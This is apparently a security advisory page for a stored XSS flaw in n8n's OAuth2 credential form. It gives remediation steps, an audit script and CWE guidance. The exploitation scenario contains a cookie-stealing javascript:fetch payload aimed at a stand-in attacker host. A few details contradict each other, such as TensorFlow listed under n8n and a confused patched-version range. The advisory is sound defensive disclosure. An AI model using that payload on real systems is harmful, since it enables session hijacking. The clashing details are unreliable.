GHSA-364x-8g5j-x2pr: n8n: stored XSS via malicious OAuth2 Authorization URL
Severity: MEDIUM

Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.
What is the risk?
Nominal CVSS 5.4 (medium) understates real-world risk in AI-heavy environments. n8n instances typically hold credentials for dozens of upstream services—LLM APIs, vector databases, data warehouses—making session takeover disproportionately damaging. Exploitability is trivial once the attacker has any credential-creation permission; no AI/ML knowledge required. Insider threat and credential-sharing abuse patterns are realistic vectors. Organizations with large n8n deployments shared across teams face the highest exposure.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | >= 2.7.0, < 2.8.0 | 2.8.0 |
Do you use n8n? You're affected.
What should I do?
5 steps:

1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field.
2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials.
3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched.
4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints.
5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.
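The AUDIT and DETECT steps above come down to one check: does the Authorization URL have an allowlisted scheme? The following is an added example, not n8n's own code. It applies that check to a constructed credential export; the record shape (`type: "oAuth2Api"`, `data.authUrl`) and the sample entries are assumptions. Because n8n stores credential data encrypted, a real audit runs over a decrypted export rather than raw database rows.

```javascript
// Added example, not n8n's own code. The record shape (type "oAuth2Api",
// data.authUrl) is assumed to resemble an n8n credential export; the sample
// records further down are constructed, not real credentials.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Scheme allowlist for the OAuth2 Authorization URL: accept only absolute
// http(s) URLs. Using the WHATWG URL parser instead of a regex matters: it
// strips leading whitespace and embedded tab/newline characters and
// lowercases the scheme, so "  JavaScript:" and "java\nscript:" both
// normalise to "javascript:" and are rejected like the plain form.
function isSafeAuthorizationUrl(value) {
  if (typeof value !== "string" || value.trim() === "") return false;
  let url;
  try {
    url = new URL(value); // no base URL: relative values throw -> rejected
  } catch {
    return false;
  }
  return ALLOWED_SCHEMES.has(url.protocol) && url.hostname !== "";
}

const authUrlOf = (cred) => (cred.data ? cred.data.authUrl : undefined);

// Audit pass: list OAuth2 credentials whose Authorization URL fails the
// allowlist so they can be reviewed and revoked.
function findUnsafeOAuth2Credentials(credentials) {
  return credentials
    .filter((c) => c.type === "oAuth2Api" && !isSafeAuthorizationUrl(authUrlOf(c)))
    .map((c) => ({ id: c.id, name: c.name, authUrl: authUrlOf(c) }));
}

// Constructed sample export (not real credentials).
const SAMPLE_CREDENTIALS = [
  { id: "1", name: "Google Sheets", type: "oAuth2Api",
    data: { authUrl: "https://accounts.google.com/o/oauth2/v2/auth" } },
  { id: "2", name: "Slack Integration (Prod)", type: "oAuth2Api",
    data: { authUrl: "javascript:void(0)" } },
  { id: "3", name: "Mixed-case scheme", type: "oAuth2Api",
    data: { authUrl: "  JavaScript:void(0)" } },
  { id: "4", name: "Data URL", type: "oAuth2Api",
    data: { authUrl: "data:text/html,example" } },
  { id: "5", name: "Relative URL", type: "oAuth2Api",
    data: { authUrl: "/oauth/authorize" } },
  { id: "6", name: "Basic auth, out of scope", type: "httpBasicAuth",
    data: { user: "svc" } },
];

console.log(findUnsafeOAuth2Credentials(SAMPLE_CREDENTIALS));
```

The same `isSafeAuthorizationUrl` check is the shape of the server-side validation the PATCH step describes: reject the field on write, not just on render.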
Frequently Asked Questions
Is GHSA-364x-8g5j-x2pr actively exploited?
No confirmed active exploitation of GHSA-364x-8g5j-x2pr has been reported, but organizations should still patch proactively.
What systems are affected by GHSA-364x-8g5j-x2pr?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI automation pipelines, workflow orchestration, LLM API integration layers.
What is the CVSS score for GHSA-364x-8g5j-x2pr?
GHSA-364x-8g5j-x2pr has a CVSS v3.1 base score of 5.4 (MEDIUM).
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0011.003 Malicious Link
- AML.T0012 Valid Accounts
- AML.T0049 Exploit Public-Facing Application
- AML.T0053 AI Agent Tool Invocation
- AML.T0055 Unsecured Credentials
- AML.T0081 Modify AI Agent Configuration
- AML.T0083 Credentials from AI Agent Configuration
What are the technical details?
Original Advisory
## Impact

An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session.

## Patches

The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability.

## Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations:

- Limit credential creation and sharing permissions to fully trusted users only.
- Restrict access to the n8n instance to trusted users only.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A disgruntled team member or attacker who has compromised a low-privilege n8n account (e.g., a developer account) creates an OAuth2 credential named something innocuous like 'Slack Integration (Prod)'. In the Authorization URL field they inject: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session, exfiltrating session cookies to the attacker's C2. The attacker replays the session token, gaining full admin access to n8n and all stored credentials—including OpenAI API keys, database connection strings, and downstream service tokens.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, Cascading Style Sheets and style property, etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Related Vulnerabilities
- CVE-2026-33663 (10.0) n8n: member role steals plaintext HTTP credentials. Same package: n8n
- CVE-2026-33660 (10.0) TensorFlow: type confusion NPD in tensor conversion. Same package: n8n
- CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation. Same package: n8n
- CVE-2026-27577 (9.9) n8n: Code Injection enables RCE. Same package: n8n
- CVE-2026-27494 (9.9) n8n: security flaw enables exploitation. Same package: n8n